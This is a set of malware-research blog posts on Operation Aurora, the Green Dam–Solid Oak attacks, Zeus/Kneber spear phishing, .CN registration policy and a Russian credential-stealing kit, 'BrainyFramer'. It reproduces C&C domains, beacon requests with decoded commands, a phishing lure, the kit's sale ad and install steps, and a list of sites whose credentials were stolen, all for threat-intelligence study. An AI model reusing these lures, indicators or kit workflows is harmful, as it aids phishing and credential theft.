Vietnam has some of the world’s largest reserves of bauxite, the primary ingredient in aluminum. The government has argued that the mine would bring economic benefits to the impoverished Central Highlands.

Opponents say the project would cause major environmental problems and have raised the specter of Chinese workers flooding into the strategically sensitive region.

OK, so maybe there is a China connection. Or maybe not.

McAfee points out that:

The command and control servers were predominantly being accessed from IP addresses in Vietnam.

Ok, back to the Aurora mess. Damballa found a sample on 2009-08-19 which they classified as Fake AV / Scareware masquerading as Microsoft Antispyware Services. This malware used several of the same command and control servers as noted by McAfee (google.homeunix.com
voanews.ath.cx ymail.ath.cx) along with more yahoo.blogdns.net, ec2-79-125-21-42.eu-west-1.compute.amazonaws.com, and ip-173-201-21-161.ip.secureserver.net inekoncuba.inekon.co.cu.

8 April 2009 – bb2aa6bf91388242dcff552eb476c545
16 April 2009 – 4488dea2071f0818d3b6269a061c2df6
3 December 2009 – 69baf3c6d3a8d41b789526ba72c79c2d
20 January 2010 – 7ee6628b8caeef57607e5426261b8c0c

McAfee has the date for W32/Vulcanbot as 01/23/2010 nine months after a sample was submitted to a ThreatExpert with common command and control servers. Is this really a new botnet? What are the apparently politically motivated attacks doing with rogue AV and typical crimeware junk? Without detailed information about the Vietnamese case its very difficult to make an accurate assessment.

GoDaddy, .CN, Malware & Freedom of Expression



The domain registrar GoDaddy testified before the U.S. Congressional-Executive Commission on China and stated that they would “discontinue offering new .CN domain names” citing concerns over an “increase in China’s surveillance and monitoring of the Internet activities of its citizens” and the “chilling effect” that the retroactive application of new requirements on .CN domain names would have.

CNNIC, which regulates the .CN ccTLD, introduced new requirements in December 2009 on registrations which many in the security community welcomed. .CN domain names are often used for malicious purposes. McAfee has listed .CN as one of the riskiest ccTLD’s. MalwareURL.com and MalwareDomainList.com (two amazing malware/security resources) have collected numerous .CN domain names used to distribute malware. The AV company Kaspersky noted:

Over the last 3–4 years, China has become the leading source of malware. Chinese cybercriminals have shown themselves to be capable of creating such huge volumes of malware that over the last two years, antivirus companies have, without exception, put most of their effort into combating Chinese malware.

However, a lot of the malware activity coming from China is because Eastern European criminal networks moved and are now abusing Chinese infrastructure, .CN domains as well as IP addresses.

Sophos noted that the regulations were having an effect. There was a decrease in spam and Sophos attributed this to the new CNNIC regulations. Symantec noted that .CN registrations used for spam were down and .RU registrations had taken their place.

Others were unsure. StopBadWare noted that since there was a 5 day grace period that would be enough time for the malicious use of .CN domain names. Many, including Isaac Mao, also raised privacy and freedom expression issues arguing that this was a crackdown on freedom of expression.

GoDaddy is now framing their decision to “discontinue offering new .CN domain names” as a freedom of expression issue. Back in 2004 I wrote about GoDaddy’s practice of denying access to its services form certain countries. Others have also had issues with GoDaddy regarding freedom of expression. In other cases, GoDaddy (among other registrars) have been criticized for being too slow to act.

So in trying to get an understanding of what’s going on, I found portions of GoDaddy’s testimony quite interesting. In particular, I’m interested in the emphasis on “Chinese nationals.”

On February 3, 2010, CNNIC announced that it would reopen .CN domain name registrations to overseas registrars. However, the stringent new identification and documentation procedures would remain in effect. CNNIC also announced an audit of all .CN domain name registrations currently held by Chinese nationals. Domain name registrars, including Go Daddy, were then instructed to obtain photo identification, business identification, and physical signed registration forms from all existing .CN domain name registrants who are Chinese nationals, and to provide copies of those documents to CNNIC. We were advised that domain names of registrants who did not register as required would no longer resolve. In other words, their domain names would no longer work.

Now, what I am unclear on is how the requirements affects non-Chinese national who a registering malware domains, pushing rogue antivirus, sending spam and all sorts ofnasty things. These regulation seems to largely target Chinese nationals — not the nationals of other countries who may be using .CN domains for malicious purposes. GoDaddy concluded:

The intent of the new procedures appeared, to us, to be based on a desire by the Chinese authorities to exercise increased control over the subject matter of domain name registrations by Chinese nationals.

We believe that many of the current abuses of the Internet originating in China are due to a lack of enforcement against criminal activities by the Chinese government. Our experience has been that China is focused on using the Internet to monitor and control the legitimate activities of its citizens, rather than penalizing those who commit Internet-related crimes.

I’m having trouble evaluating GoDaddy’s new found (to me anyway) commitment to freedom of expression. I do welcome it and I hope they are serious about it and demonstrate their commitment by joining the Global Network Initiative. But I’m hoping that they don’t confine their interest in freedom of expression solely to China but rather evaluate and assess freedom of expression and privacy across their business operations.

UPDATE:

WP: In response to new rules, GoDaddy to stop registering domain names in China
Dancho Danchev: “With CN/RU requirement for scanned IDs in order to register a domain,underground services are already monetizing the Photoshop-ing process.”

Malware Attacks on Solid Oak After Dispute with Greendam



A while back I posted an analysis of attacks on Solid Oak (the makers of CyberSitter) after a dispute with a Chinese firm that produced GreenDam over stolen code. Rob Lemos covered the story and also revealed that the law firm representing Solid Oak subsequently came under a similar targeted malware attack. The story has surfaced again, this time in connection with APT. I’ve reposted the original from malwarelab.org below.

Malware Attacks on Solid Oak After Dispute with Greendam

By Nart Villeneuve

After researchers discovered that portions of China’s Greendam filtering software were stolen from an American filtering company’s software, Cybersitter, the company that produces the software, Solid Oak, same under a targeted malware attack. This short post from the Malware Lab (www.malwarelab.org) analyzes two samples from the attacks.

Findings:

  • The delivery component of the attacks specifically targeted Solid Oak. In one case the attackers registered and used a Gmail account that was a misspelling of of a Solid Oak employees name and used it to send an email about a contextually relevant topic.
  • These targeted emails contained (or linked to) malicious files that, if opened, caused the targets computer to become infected with a Trojan Horse program.
  • In both cases the Trojan connects to (related) web servers but requests seemingly legitimate files. However, at certain times the attackers insert HTML command tags into these files with commands.

Background

In June 2009, it was reported that the Chinese government was requiring the installation of filtering software, known as Green Dam, on all personal computers sold in China.1 Researchers from the University of Michigan analyzed Green Dam and discovered security vulnerabilities that would allow malicious attackers to take control of any computer running Green Dam.

In addition, they found that portions of Green Dam’s block lists were taken from a U.S. Company, Solid Oak, that produces a filtering product called CyberSitter, and that the image filtering component was taken from OpenCV, an open source project.2 Bryan Zhang, the founder of Jin Hui, the company that created Green Dam, denied that Green Dam contained stolen code and stated that it was “impossible”.3 Solid Oak released a report detailing the incident and is reportedly seeking legal action against PC manufacturers that are shipping computers with Green Dam installed.4

On June 25, 2009 reports emerged stating that Solid Oak was under attack. In addition to “server problems” company executives began receiving suspicious emails.5

The following is an analysis of samples of malware sent to Solid Oak.

Sample 1

On June 25, 2009 an email message was sent to Brian Milburn, the CEO of Solid Oak, from “jenna.dipaquale@gmail.com”; Jenna DiPasquale (note the missing “s”) is the head of public relations for Solid Oak.

Date: Thu, 25 Jun 2009 05:49:18 -0400
Subject: This is the Jinhui Computer System Engineering Inc’s report about China’s Green Dam Youth Escort screening software.
From: Jenna DiPaquale
To: bmilburn@solidoak.com

This is This is the Jinhui Computer System Engineering Inc’s report about
China’s Green Dam Youth Escort screening software.
www.civis.com/jinhui_report.zipabout China’s Green Dam Youth Escort
screening software.
www.civis.com/jinhui_report.zip

The file, jinhui_report.zip, was no longer available at www.civis.com at the time of analysis so sample that Solid Oak provided was used. The zip file contains an executable:

Jinhui_Computer_System_Engineering_Inc_the_Chinese_government_officials_report.exe

However, Windows computers have a “feature” enabled by default that hides file extension cause the malicious executable to appear as if it is a directory/folder.6

When the malicious file is run (the user thinks he or she is opening a directory), a directory with the same name is created and the contents of that directory (a Word document, Jinhuisays.doc) is displayed to the user while malicious software is dropped on the system. The malicious file issues a connect to http://www.chuckfaganco.com/docs/rmscpt5.htm (76.76.146.89) (See Threat Expert for an automated report.7)

The User-Agent contains some interesting characters:

GET /docs/rmscpt5.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) z3?xwc.InfoPath.so
Host: www.chuckfaganco.com

The response contains a “command” in a HTML comment tag:

<!– {/*jgJ-.J} –>

This command has since been removed from the requested page.

After opening the malware, a document is displayed, Jinhuisays.doc, but it does not contain malware.8

Sample 2

The second sample is a Power Point file, “Solid Oak seteps up China’net nappy.ppt” that exploits a vulnerability in Power Point to drop a malicious file. (For automated reports see Threat Expert and Virus Total.) 9

The malware drops a file “Net110..exe” which issues a connection to http://www.parkerwood.com/help/403-3.htm. (69.20.4.85) (For an automated report see Threat Expert.)10

Unlike Sample 1, the User-Agent does not contain interesting characters:

GET /help/403-3.htm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
Host: www.parkerwood.com

This command appears as a html comment in the response:

<!– czox –>

base64 decode = s:1

It eventually changed to:

<!– czozMDA= –>

base64 decode = s:300

Other commands seen on www.parkerwood.com by accessing a variety of other pages throughout the site, such as /help/403-1.htm, /help/403-2.htm, /help/403-4.htm, /help/403-7.htm.

<!– czo0 –>

base64 decode = s:4

<!– czoyNDA= –>

base64 decode = s:240

<!– ZDpodHRwOi8vd3d3LnBhcmtlcndvb2QuY29tL2ltYWdlcy90b3AuZ2lm –>

base64 decode = d:http://www.parkerwood.com/images/top.gif

<!– {/*jgJ-nJ} –>

After dropping the Trojan, a Power Point presentation opens.

One interesting behaviour of this particular case is that the page(s) that the malware connects to change quite frequently. At times, command are inserted into the page in HTML comment tags only to be completely removed at a later time, sometimes within several hours of first appearing. These commands also change over time. In addition, sometimes pages are no longer present (404) but re-appear at a later time. At other times, all the pages are restricted (403).

Sample 2 connected to http://www.parkerwood.com/help/403-3.htm every 10 minutes. These connections were monitored starting at Fri Jul 10 14:50:01 2009 and after finally receiving a command Sat Jul 11 22:20:47 2009 the malware did not issue any further connections (the monitoring stopped at Wed Jul 15 08:11:44 2009).

Fri Jul 10 14:50:01 2009 – 403 Forbidden No Command
Fri Jul 10 23:10:16 2009 – 404 Not Found No Command
Sat Jul 11 22:10:46 2009 – 403 Forbidden No Command
Sat Jul 11 22:20:47 2009 200 OK <!– czozMDA= –> (base64 decode = s:300)

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] http://www.nytimes.com/2009/06/09/world/asia/09china.html
[2] http://www.cse.umich.edu/~jhalderm/pub/gd/
[3] http://online.wsj.com/article/SB124486910756712249.html
[4] http://www.cybersitter.com/gdcs.pdf and
http://www.pcworld.com/businesscenter/article/167842/suit_over_chinas_web_filter_to_target_lenovo_acer_sony.html
[5] http://government.zdnet.com/?p=5034, http://government.zdnet.com/?p=5049,
http://www.informationweek.com/story/showArticle.jhtml?articleID=218101882
[6] http://www.f-secure.com/weblog/archives/00001675.html
[7] http://threatexpert.com/report.aspx?md5=783c50f221c339f244ac68b38fcd30af
[8] http://www.virustotal.com/analisis/33e5495969fd497c439d18e7ea3976845c5454b378764a7b5dd887eef6bc8a9e-
1247083107

[9] http://www.threatexpert.com/report.aspx?md5=86f7cc8f65522a9d7eed8adf22bb9772 ,
http://www.virustotal.com/analisis/d1a5e159bfcdf3a22abf521d91bc83dd70ac3b1155c46eac5106450df17eb56b-
1247073429

[10] http://www.threatexpert.com/report.aspx?md5=1778671314196147402789eeb0c6d89c

The Aurora Mess



The data about Aurora has always felt just a little off for me. Maybe its that everyone writing about it just has their own piece of the puzzle to analyse, without the detail required to accurately link the pieces together.

When it comes to the command and control infrastructure, maybe it’s that some obfuscated the domain names while others published them, but with a domain on the blog post that’s not in technical write up. Maybe it is that some have significantly bigger lists than others (that include duplicates as well as the root domain for a dynamic dns provider that hands out sub-domains).

Maybe it is that some name domains that hosted the exploit but do not provide details on C&C’s that compromised hosts check-in with. Maybe the difference between the long lists and short lists is that some are including “copycats” — sites that host the IE exploit. Since “Aurora” is now being used to refer to the specific attack on Google, the 0day vulnerability in Internet Explorer (that was apparently used), and the malware that was apparently dropped by the exploit (Hydraq) interchangeably it is difficult to get a handle on exactly what is what.

Google says the attacks were “highly sophisticated and targeted” (as does McAfee, Mandiant, and iDefense) while Damballa says that it was the work of amateurs, Dancho Danchev says that “[i]t’s in fact [an] average team” and Mikko Hypponen says “[t]his wasn’t in my opinion ground-breaking as an attack. We see this fairly regularly.” OK, well, that’s quite the continuum of “sophistication.” Back to that in a bit.

Attribution? The New York Times reported that the attacks were traced to two schools in China: Shanghai Jiaotong University and the Lanxiang Vocational School. While some have drawn links between these schools and the Chinese military others cast doubt on it. The Financial Times reportsthat “a freelance security consultant in his 30s” in China wrote (part of) the Internet Explorer exploit but “is not a full-time government worker, did not launch the attack, and in fact would prefer not be used in such offensive efforts.” Hmm. OK. Mandiant indicated that the quality of the exploit points toward some kind of relationship with the Chinese state, while iDefense, looking at the command and control infrastructure, pretty unambiguously states that the Chinese State was being the attacks whether or not “amateurs” were used.

So here we are at the crossroads of the exploit, the malware, and the command and control infrastructure. And as Richard Bejtlich points out there’s more to it than just the technical aspects of malware, there is, as Mike Cloppert describes, a range of indicators that allow one to characterize the adversary behind the attacks. Clearly, most of us relying on public sources do not have a sufficient level of detailed information to analyse the attack on Google with such depth.

This brings me back to the Damballa report. I really liked this report because is focused on the command and control infrastructure, it was based on interesting data collected via passive DNS data collection and included many interesting conclusion and enough detail to begin connecting their data with other publicly available data. In fact, one of the most interesting observations for me was evidence that the DNS resolutions indicate that Google China was compromised first, followed by Google in Mountain View some 17 hours later. Still, there are parts of the report that are confusing to me.

The Damballa report starts by looking at “five CnC domain names associated with the Aurora botnet” that were publicly disclosed, however, these domain names are not explicitly stated in the report. The most seemingly authoritative list, from Symantec, for example, lists 7 domains. The starting point appears to be “blog1.servebeer.com”. This one is common to all lists (except Symantec’s technical write-up). The domain servebeer.com is a Dymanic DNS serverice offered by No-IP that allows people to register sub-domains such as “blog1.” Based on factors such as “DDNS credentials” Damballa linked the following domains together (four of which are not disclosed).

CnC_Domain.1
CnC_Domain.2
CnC_Domain.3
CnC_Domain.4
blog1.servebeer.com

At some point each of the 5 domains above pointed at at least one of the “IP addresses associated with two of the CnC servers used during the Aurora attack.” The IP’s were not disclosed. Therefore, I am not entirely sure of how the next group of domain names are linked.

baltika1.servebeer.com
m7been.zapto.org
miecros.info
mcsmc.org
yahoo.blogdns.net
filoups.info
google.homeunix.com

While the last 2 domains (filoups.info and google.homeunix.com) appear on the US CERT list of “Aurora” domains, the first 5 domains (baltika1.servebeer.com, m7been.zapto.org, miecros.info, mcsmc.org, and yahoo.blogdns.net) do not.

Damballa then links this second group to “two distinct families of Fake AV Alert / Scareware: Login Software 2009 and Microsoft Antispyware Services.”

Fake AV Alert / Scareware
mcsmc.org
micronetsys.org
mnprfix.cn
filoups.info
miecros.info

Fake Microsoft Antispyware
ec2-79-125-21-42.eu-west-1.compute.amazonaws.com
ip-173-201-21-161.ip.secureserver.net
inekoncuba.inekon.co.cu
google.homeunix.com
yahoo.blogdns.net
voanews.ath.cx
ymail.ath.cx

So, filoups.info links the “Fake AV Alert / Scareware” to the US CERT list of “Aurora” domains and google.homeunix.com links the “Fake Microsoft Antispyware” to the US CERT list of “Aurora” domains. Both appear in Damballa’s second cluster (which has an unclear relationship with the first cluster).

Using the Damballa list along with samples from ThreatExpert I compiled a list that included a few additional domain names. I included domain names that the individual piece of malware requested that had similar paths to those identiofied by Damballa and excluded those that appeared to be other malware or SEO URLs.

For example, one sample contains google.homeunix.com, yahoo.blogdns.net, tyuqwer.blogdns.com, and tyuqwer.dyndns.org. The domains google.homeunix.com and tyuqwer.dyndns.org appear on the US CERT list, yahoo.blogdns.net appears on the Damballa list and tyuqwer.blogdns.com appears on neither. Another sample contains google.homeunix.com tyuqwer.dyndns.org blogspot.blogsite.org and voanews.ath.cx. All of these domains appear on the US CERT list google.homeunix.com and voanews.ath.cx appear on the Damballa list.

The next grouping largely focuses on “mcsmc.org” abnd the domain names that apear with it and request similar URL paths but are not in the Damballa report.

virtualmits.com
syswa.cn
thcway.info
searchnix.info
wscntgy.com
google-analitics.in
licagreem.in
jusched.in

The relationships between the domains can be built our further, especially if we include common IP addresses. I think this indicates that there are a variety of conclusion being drawn based on data that comes bundled with a variety of assumptions. For example, is the sample detailed by Symatec the same — as opposed to similar to — the one used in attack on Google? How were these “master” lists — such as the one by US CERT created? How were these domains bundled together?

In the Damballa report in particular there are a few additional assumptions that I am not entirely sure of. First, I’m not sure that DDNS == amateur. Many of the targeted attack on civil society and human rights groups I’ve looked at used DDNS. And while many DDNS providers do cooperate with the security industry and law enforcement, the ones in China (like 3322.org) don’t. Moreover, I’m not sure that “amateur” necessarily excludes state involvement — even governments can engage in behaviour that would be considered amateurish. And would you want to tip off state involvement by being uber3l33t? The logic just starts to become circular after a while, especially if you only focus on the technical aspects.

I mean, if we take Google at their word and believe that “a primary goal of the attackers was accessing the Gmail accounts of Chinese human rights activists” how do we explain the connection to (probably Eastern European) SEO and related common malware?

Even if we assume that the “master” list is accurate, Damballa does raise some alternative explanations for the association between the two:

  • it is possible that two different groups purchased the services of the same crimeware group (probably the same people behind Operation Aurora) to distribute and manage their malware family. Or the crimeware group rented out different variants of the same malware to different groups with different intentions.
  • There is no natural progression seen between the two families. Usually malware writers evolve in both technology and protection of their creation but these two families did not show any related evolution. The malware families appear to exist independently, and then become superseded by Trojan.Hydraq.

The relationship between crimeware — or common botnet operators/kits — and targeted malware attacks in order to extract sensitive data (some might call this espionage) is something I tried to explore in “The “Kneber” Botnet, Spear Phishing Attacks and Crimeware.” Again, given the lack of precise data I don’t claim to know what’s going on in the Google case — in fact, I may have just made it worse with this post. But if we accepts the links that Damballa has found to be accurate it does raise the important issue of the relationship between crimeware and espionage.

But, maybe, we’re jumping to conclusions based on faulty assumptions. I just don’t know. It is still a mess.

The “Kneber” Botnet, Spear Phishing Attacks and Crimeware



After I received an email from Jeff Carr warning about a spoofed email containing malware, I asked Jeff to send it along. It turns out that the attackers also used portions of a blog post by Brian Krebs as lure. What interesting is that the attack targeted .mil and .gov email addresses using text from Carr and Krebs about an earlier attack targeting .mil and .gov email addresses. A quick analysis of the sample indicated that it was Zeus and was beaconing to a known Zeus command and control server. However, the interesting part, for me, is what happened after getting compromised by Zeus, and I have to really thank Jeff for passing along the email because it led me to this stuff.

Around the same time news of the Kneber botnet broke and Netwitness linked the two attacks together. While much of the coverage of Kneber was hype-filled, the actual report by Netwitness is excellent and you can get a hype-free overview by Alex Cox, the guy who discovered it, here. The response of some of the AV vendors has been troubling. Essentially some said that this is nothing new, it’s just Zeus, and that there’s long been AV protection for Zeus. Netwitness responded stating that many AV’s actually did not detect the samples they analyzed.

The sample from the sample I analyzed the coverage was 18/41 on Virustotal.

The main issue for me was the use of Zeus to drop malware that focused on document removal and that it was used in conjunction with spear phishing attacks on .mil/gov email addresses. This second drop was 5/41 on Virustotal.

From the data it seems like the attackers were capturing whatever they could, not retrieving specific documents. That said, they managed to compromise the types of people they appeared to be after (in terms of who the phishing mails were sent to) and in a few cases managed to get some very interesting documents.

I think the broader issue is what Brian Krebs alluded to in the comments section of his blog – and Netwitness indicated this as well — that is if we believe that these crimeware types are squeezing all the monetary value they can out of their operations, what would they do with the type of information that has intelligence value but is not easily monetized in a traditional sense? And how better to obscure attribution that to use existing crimeware infrastructure for what appears to be more espionage that traditional crime?

I am keeping these as open questions because I am not sure how strong the connection is and tend to be cautious on these issues. But I do think it is an interesting case.

Read the full post here and here.

UPDATE: I’ve copied the report into this post.
More… »

Google’s New Approach



Google has just announced that there were successful attacks against their infrastructure resulting in the theft of intellectual property. Google traced the attacks to China and although the attribution regarding the Chinese government is unclear, Google also discovered that the attackers also attempted to compromise the Gmail accounts of Chinese human rights activists.

But the most interesting result was due to the combination of attacks, surveillance and censorship Google has decided to reassess their operations in China:

These attacks and the surveillance they have uncovered–combined with the attempts over the past year to further limit free speech on the web–have led us to conclude that we should review the feasibility of our business operations in China. We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all. We recognize that this may well mean having to shut down Google.cn, and potentially our offices in China.

The decision to review our business operations in China has been incredibly hard, and we know that it will have potentially far-reaching consequences. We want to make clear that this move was driven by our executives in the United States, without the knowledge or involvement of our employees in China who have worked incredibly hard to make Google.cn the success it is today. We are committed to working responsibly to resolve the very difficult issues raised.

Wow.

The connection between censorship, surveillance and attacks is the key. Censorship, such as the blocking of web sites, is fairly crude but effective when combined with targeted surveillance and attacks. While many, especially the technically savvy, can circumvent China’s filtering system, the “GFW”, using tools such as Psiphon and Tor most Chinese citizens do not. The GFW doesn’t have to be 100% technically effective, it just has to serve as a reminder to those in China about what content is acceptable and that which should be avoided. The objective is to influence behaviour toward self-censorship, so that most will not actively seek out banned information of the means to bypass controls and access it.

The nexus of censorship, surveillance and malware attacks allows China is the key to China’s information control policies. It is not just about the GFW. Internet users in China face complex threats that are heavily dependent on additional factors, such as involvement in political activities, that involve targeted attacks and surveillance. China chooses when, where and how to exercise this granular control.

The InfoWar Monitor — which is a partnership between the Citizen Lab, Munk Centre for International Studies, University of Toronto and The SecDev Group (and SecDev.cyber which focuses on Internet threats) — has been focusing on these threats. For example, in a report “Breaching Trust: An analysis of surveillance and security practices on China’s TOM-Skype platform” we documented how Tom-Skype (the Chinese version of Skype) was censoring and capturing politically sensitive content. In “Tracking GhostNet: Investigating a Cyber Espionage Network” we documented targeted malware attacks that compromised over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

Google’s decision to re-asses their operations in China is courageous. I strongly hope that Microsoft, Yahoo! and others follow Google’s lead — as, to their credit, they have done in the past. In “Search Monitor Project: Toward a Measure of Transparency” I compared the censorship practices of Google, Yahoo! and Microsoft as well as the domestic Chinese search engine Baidu and found that all followed Google’s lead to some extent by at least disclosing their censorship practices to their users. I hope that they stand by Google.

China, the ball is in your court.

Malware Market



It’s no surprise that there is a malware market, an ecosystem of buyers, sellers and middlemen known as “guarantors”. In a very interesting post, “The botnet ecosystem“, Vitaly Kamluk explains the way in which this system works. There is a malware market in which malicious code and services are exchanged with the help of trusted third parties — usually administrators of popular forums. In addition, compromised hosts and stolen credentials are also exchanged.

Here’s a microcosm of this ecosystem that I stumbled upon recently. A member of a forum (forum.inattack.ru) called “Brainy” posts an add for a bot system that steals FTP and HTTPS credentials:

brainy

Here’s the Google translate version of a post by “brainy”:

[brainyframer], bot freymer \ Gruber \ sniffer
20.11.2009, 2:06

I offer you a bot freymer / sniffer / Graber my production [BrainyFramer]
This bot will be a good assistant to many who are professionally engaged cores.

Functional:
Graber-21 FTP client
FTP-sniffer with 37 different clients (web browsers including)
-HTTPS formgraber for IE (5,6,7,8) and FF. For snifa panel hosting (~ 120 different hosts)
-Freymer Semiconductors, distributed processing your list of FTP bots. High speed. Frame akov from the bot after snifa. Removal of foreign code.

Admin at work:
Screen

Progruzheno loader for 100 cars
Article: How to see otstuk 75%
Palimost build in test 4 AB.

____________________________

Price build: 400vmz
____________________________

[!] Everyone who bought a free upgrade.
[!] Change link for free.
[!] Questions, setting free too (IMG: http://html.forum.web-hack.ru/emoticons/smile.gif)
[!] Soft palitsya. I do not crypt. I give the contact person who does it.
[!] On Vista and windows 7 is not working.
————————————————– ———–

Answers to frequently asked questions:
——
Question: What palitsya. Traverses a firewall?
A: Soft works in the context of web browsers and FTP client system. If these applications have access to the network, the bot will work.
—–
Q: Why do little in the FTP log
Answer: It depends on your downloads. With 1K purchased downloads usually goes akkov 20-100. 0.5-1K Semiconductors with 1K of purchased downloads is a myth.
If you download from the dor. traffic Kay “download ftp client” then you understand that the FTS in the log will be more.
—–
Q: What about an exchange for …?
Answer: No, I do not need anything except money.
—–
Question: Is it possible to test?
Answer: I have no desire and time to make someone test. Soft checked in not only me alone.
—–

Asya> 3_5266891_7

brainy2

A forum administrator vouches for brainy, acting as the trsuted middleman or “guarantor”. Here’s the Google translate version:

Take this software is already long enough. All the alleged author of the software options – do. The author – an appropriate person with whom pleasant girl. Update issued on a regular basis. In general – I recommend.

On a server hosting some other nasty stuff including the Liberty exploit kit I found Brainy’s kit:

IP: 210.51.166.220

Domains:

bale.ws
ciao.ws
prefix.ws
hzone666.cn

Here is the readme file that comes with the bot:

Скрипты для [BrainyFramer]

0. conf.php – Настройки базы и рабочих линков
1. create.php – Создает таблицу
3. get.php – Дает боту настройки.
4. check.php – Админка
5. list.txt – Список фтп
6. \logs\ftp.log – Лог c фтп (права 755)
7. \logs\https.log – Лог c https (права 755)
8. grab.dll – Модуль грабера, не трогать!

Как установить эти скрипты?
——————————–
-Делаем настройку папки, чтобы поисковые боты не бегали по нашим файлам)
-Создаем базу данных для них, пишем настройки базы , также задаем логин и пасс на админку.
-Запускаем create.php, если все Ок с настройками , то будет надпись “Таблицы созданы”
-Загружаем список фтп акков (список должен быть в простом текст. формате) на сервер в папку с скриптами, имя файла со списком (поумолчанию list.txt) пишем в conf.php
——————————–

(с) Brainy 352668917

Google translate:

Scripts for [BrainyFramer]

0. conf.php – Base settings and working links
1. create.php – Creates a table
3. get.php – Gives the bot settings.
4. check.php – Admin
5. list.txt – List of Semiconductors
6. \ logs \ ftp.log – log c Semiconductors (Law 755)
7. \ logs \ https.log – log c https (Law 755)
8. grab.dll – Module Graber, do not touch!

How to install these scripts?
——————————–
-Makes setting up a folder to search bots did not run on our files)
-Creating a database for them, write the base configuration, is also asking login and pass on the admin panel.
Run-create.php, if everything is OK with the settings, it will be marked “Table created”
-Load the list of FTP akkov (list must be in plain text. Format) on the server in the folder with the script, the file name from the list (poumolchaniyu list.txt) write in conf.php
——————————–

(c) Brainy 352668917

brainy3

Today the list.txt (which contains compromised FTP accounts) has 528 entries. this list has varied over time at one time swelling to 100,000 entries, although many were duplicates. Also, many accounts were taken from public postings of compromised FTP accounts. (Nov 1 – 23632 list.txt, Nov 15 – 100000 list.txt).

The ftp.log file, which are FTP credentials that this instance of the BrainyFramer kit has captured contains 1684 entries. Many are local accounts, anonymous accounts and so on. The 528 entries in list.txt appear to be a cleaned up version of the entries in ftp.log.

The most interesting file is https.log which contains credentials captured from HTTPS sessions. This file is 2.8 MB and contains credentials captured from 2059 unique IP addresses.

infectedhosts

Credentials were captured for users with accounts on 125 sites:

ac-s8.mcafee-sms.com
adklik-adpartner.mynet.com
app.expressemailmarketing.com
applin0.hostedsitebuilder.com
apps.rackspace.com
appserver.5paisa.com
auth.mail.ru
billing.hostley.net
billing.justhost.com
bne003wm.server-secure.com
bolton.eukhost.com
cart.godaddy.com
club.panasonic.jp
dc-au.server-secure.com
domains.live.com
ea.onlineregister.com
echosting.cafe24.com
email.1and1.com
email.secureserver.net
email05.secureserver.net
firstfreedom.securepagehost.com
gator340.hostgator.com
gen.gmarket.co.kr
host1.medcohealth.com
host136.aessuccess.org
hotsms.www.hi.nl
htdatabase.fluidhosting.com
idp.godaddy.com
in.adserver.yahoo.com
intranic.nic.in
irenerobles.readyhosting.com
login.1und1.de
login.bluehost.com
login.hosted-commerce.net
login.mcafee-sms.com
mail.bsf.nic.in
mail.nextpharma.com.tr
mail.nic.in
mailhost.hrhgeology.com
mailserver2.security-forces.com
market.egitimonline.com
market.mynet.com
market.sealonline.co.kr
netac80.vie.hosting.nokia.com
onlinedoctor.lloydspharmacy.com
p2.secure.hostingprod.com
partner.allianz.hu
passport.yandex.ru
portal.bsh-partner.com
rbserver.achievacu.com
rdserver.rd.go.th
register.btinternet.com
register.dailymail.co.uk
register.facebook.com
register.go.com
register.hp.com
register.metro.co.uk
register.outspark.com
register.perfectworld.com
register.remedylife.com
register.scansoft.com
registration.lycos.com
rni.nic.in
secure.domain.com
secure.hostelbookers.com
secure.odlmarkets.com
secure.server101.com
secure.turhost.com
secure.turkishost.com
secure01.bankhost.com
server.iad.liveperson.net
server.lon.liveperson.net
server.ylos.com
server10.dollarsonthenet.net
server11.dollarsonthenet.net
server12.dollarsonthenet.net
server7.dollarsonthenet.net
server8.dollarsonthenet.net
server9.dollarsonthenet.net
serverfarm.pubblica.istruzione.it
sitemail.hostway.com
smsforlife.matssoft.co.uk
sponsorlusms.turkcell.com.tr
sprint.ehosts.net
srv25.trwww.com
secure.turhost.com
suze.ucs.louisiana.edu
webhosting.icicibank.com
webmail-au.server-secure.com
webmail.makromarket.net
webmail.ruc.dk
webmailcluster.perfora.net
webserver.afyon.bel.tr
webserver.zeytinburnu.bel.tr
websms.djezzy.com
www.adbrite.com
www.bostonmarketjobs.com
www.cart32hostingred.com
www.domaindiscount24.net
www.foundationapi.com
www.garantiserver.com
www.gmarket.co.kr
www.gmarket.com.sg
www.godaddy.com
www.handelsregister.de
www.hc.ru
www.host.net.tr
www.hostelsclub.com
www.jetsms.net
www.kaynaksms.com
www.limitsizhosting.com
www.lloydspharmacy.com
www.members.hostiga.com
www.nic.lv
www.nic.ru
www.nic.tr
www.register.bilgi.edu.tr
www.smsodyssey-a01.com
www.speakerrepair.com
www.teknoserver.net
www.topmarketer.net
www.voshost.com
www.webmarket.com.tr
www.webmarketplace.de
www.websms.com.tr
www1.soriana.com

The .ws registrar has suspended the domain names, the Chinese CERT appears to have taken action against the command and control server residing in their IP space, and AusCERT has been a great help with notification. (And thanks to Jose Nazario too).

Adventures in Russian Malware



I just posted an analysis of a pcap file from a political figure. While I expected to find targeted malware tat was possibly associated with political activities, I found a bunch of Russian/Ukrainian malware. What I found interesting, and which seems to match what key security community folks are seeing (here and here), is a “bundling” of malware. In this case, a Black Energy bot was bundles with with the “Oficla/Sasfis” Trojan downloader as well as RogueAV (Win32.FakeScanti).

Another interesting issues was the use of Chinese IP addresses by the Russian malware (which given the political figure whose computer was infected, Chinese IP addresses were contextually relevant). This is certainly not new, (see here, here etc…) but I think it hits home the point that simply relying on GeoIP to determine attribution and/or motivation is misguided.

I tried to link part of this operation to someone who appears to be some sort of “middleman” who propagates a variety of malware. There are a variety of posts on forums by “rundll32” in which he advertises an “affiliate program” that “is not detected by any antivirus.” In the ad he uses the domain rundll32.ru which is registered to “rundll32@yandex.ru” which was also used by Alexander V. Prokhorov (or Prochorov) in a paper submitted at Moscow State University.

I find the relationships between the various groups and how different individuals and groups within the malware ecosystem get ultimately paid very interesting.